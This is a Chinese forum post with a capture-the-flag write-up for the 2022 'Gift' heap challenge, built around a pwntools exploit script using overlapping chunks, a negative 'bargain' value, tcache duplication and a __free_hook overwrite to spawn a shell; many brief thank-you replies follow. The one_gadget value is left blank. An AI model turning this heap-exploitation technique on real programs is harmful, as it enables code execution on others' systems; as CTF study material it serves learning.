UlyssesDen 发表于 2025-5-28 22:19:01

[巅峰极客 2022]Gift+堆栈重叠+整数溢出

[巅峰极客 2022]Gift


这个是他的一个主要代码在我们分析的时候会发现有功能的只有三个函数体因此我们主要看这里几个就可以了
因此我们查看数据的时候会发现几个漏洞点一个是那么我们先看源代码




在这几个函数体中我们会发现bargain这个函数他有着要给对堆块数据的一个相减的作用因此我们可以使用这个函数实现要给tacahe dup的一个攻击手法
因此我们这附上核心代码
io = remote("node4.anna.nssctf.cn", 28962)
choose(1, b"a" * 0xa0 + p64(0) + p64(0x471))# 0
choose(1, "bbbbb")# 1
choose(1, "cccc")# 2

remove(0)
remove(2)
bargain(2, -0xc0)

choose(1, "/bin/sh")# 3
choose(1, "eeee")# 4
# gdb.attach(io)
choose(1, "ffff")# 5
choose(1, b"g" * 0xd0 + p64(0) + p64(0x21))# 6
# debug()

remove(4)
check(4)
ru("cost: ")
libc_base = int(ru('\n')[:-1], 10) - 0x3ebca0
slog("libc_base", libc_base)

libc = ELF("/home/fofa/桌面/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc.so.6")
free_hook = libc.sym['__free_hook'] + libc_base
system_addr = libc.sym['system'] + libc_base
slog("system_addr", system_addr)
remove(5)
remove(1)
choose(2, b'\x00' * 0x38 + p64(0x111) + p64(free_hook - 0x10))# 7
choose(1, "aaa")# 8
one_gadgets =
shell = one_gadgets + libc_base
choose(1, p64(shell))# 9
remove(3)
io.interactive()
来源:新程序网络收集,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

狞嗅 发表于 2025-10-13 11:56:39

东西不错很实用谢谢分享

捐催制 发表于 2025-11-21 23:24:55

懂技术并乐意极积无私分享的人越来越少。珍惜

嫁吱裨 发表于 2025-12-14 03:20:08

新版吗?好像是停更了吧。

姬宜欣 发表于 2025-12-16 20:35:33

感谢发布原创作品,程序园因你更精彩

左优扬 发表于 2025-12-19 05:17:53

前排留名,哈哈哈

格恳绌 发表于 2025-12-24 11:20:37

鼓励转贴优秀软件安全工具和文档!

椎蕊 发表于 2025-12-24 20:47:19

谢谢分享,辛苦了

吁寂 发表于 2026-1-12 21:46:10

用心讨论,共获提升!

汪之亦 发表于 2026-1-13 18:36:28

东西不错很实用谢谢分享

乱蚣 发表于 2026-1-15 23:22:10

分享、互助 让互联网精神温暖你我

告陕无 发表于 2026-1-16 07:36:19

过来提前占个楼

煞赶峙 发表于 2026-1-17 04:10:52

谢谢楼主提供!

撙仿 发表于 2026-1-20 02:14:12

这个好,看起来很实用

杜优瑗 发表于 2026-1-21 06:15:39

喜欢鼓捣这些软件,现在用得少,谢谢分享!

柏球侠 发表于 2026-1-21 12:19:46

感谢,下载保存了

姬宜欣 发表于 2026-1-21 15:53:02

东西不错很实用谢谢分享

劳怡月 发表于 2026-1-23 02:10:36

感谢,下载保存了

郦珠雨 发表于 2026-1-24 08:38:41

过来提前占个楼

旱由 发表于 2026-1-25 11:46:38

喜欢鼓捣这些软件,现在用得少,谢谢分享!
页: [1] 2
查看完整版本: [巅峰极客 2022]Gift+堆栈重叠+整数溢出